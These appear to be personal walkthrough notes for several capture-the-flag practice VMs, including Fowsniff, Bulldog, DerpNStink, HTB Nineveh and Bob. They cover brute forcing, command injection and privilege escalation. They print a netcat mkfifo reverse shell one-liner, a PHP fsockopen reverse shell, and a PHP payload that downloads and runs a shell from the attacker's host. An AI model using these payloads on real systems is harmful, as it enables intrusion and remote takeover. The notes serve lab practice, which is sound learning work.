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56 VM Fowsniff: 1

Notes: A.[imap and pop3 ports, access mailbox from cli, add python reverse shell to banner so when a user logs in , the banner runs and get root access, metasploit pop3 access Walkthru:
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55 VM Bulldog 1

Walkthru : A. [passwowd hash in source, webshell with limited command but use || or && to run any command, crontab, python  reverse shell  for priv escalation ] B. [pwd in binary file extract it using strings file] C. [read files from webshell] D. [upgrade shell] Notes: There was a crontab file that runs daily. I tried to add bash revershell, added user to sudoer file, php reveershe shell but non worked. but I was able to create a file using that crontab which lead me to believe it is possible to perform escalation using it. I used rm cmd to perform revershell reveres shell rm /tmp/f|mkfifo /tmp/f|cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f nc -n...

54 VM W1R3S: 1.0.1

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53 VM Basic Pentest 2

Walkthru A. [brute force passphrases for ssh login, convert private key to another format so we can use john to brute force key ] B. [ use  ssh2john  to convert this SSH key into a crackable file for john the ripper. ] C. [ vim.basic have root permissions, that means that I could probably read the file in kay’s directory, ] Notes; [from walktheu B] python ssh2john key > ssh_login john ssh_login

52 VM DerpNStink: 1

Walkthru A. [wordpress, wpscan, wordpress vuln, access via mysql user/pwd hashcat, pwd in pcap file, sudo user will get you root access but the file/dir in sudo doesnt exist so you have to create one dev reverse tcp ] B. [use private key ssh to login] Notes A. not sure how the password was cracked using hashcat. tried a single hash but didnt work. another hash worked

48 VM HTB Nineveh

Walkthru: A. [hydra brute force www, searchsploit php Lite Admin 1.9, hydra brute force https where username is irrevalant but just required to complete the command, php reverse shell, Create a database in phpLiteAdmin and table , directory traversal  ,  chkrootkit   privilege escalation bug,  port knocking ,  strings to extract key from png file  ] Notes: Unable to test it since the VM had static IP. Read Waltthru Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content Change Database  and add a table inside called shell, select 1 field: Name the field whatever we wish, set it as text type, put  <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>  into the default value & click create. This should create a new table with our exploit...

47 VM Bob 1.0.1

Walkthru: A.[webshell, robotos.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawing a python shell, ssh on non default port, search for txt file, password in text file, gpg file where keys is first alphabets of the line of a file,] B. [burp] C. [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files not useful here] Notes: file #!/bin/bash clear echo "-= Notes =-" echo "Harry Potter is my faviorite" echo "Are you the real me?" echo "Right, I'm ordering pizza this is going nowhere" echo "People just don't get me" echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>" echo "Cucumber" echo "Rest now your eyes are slee...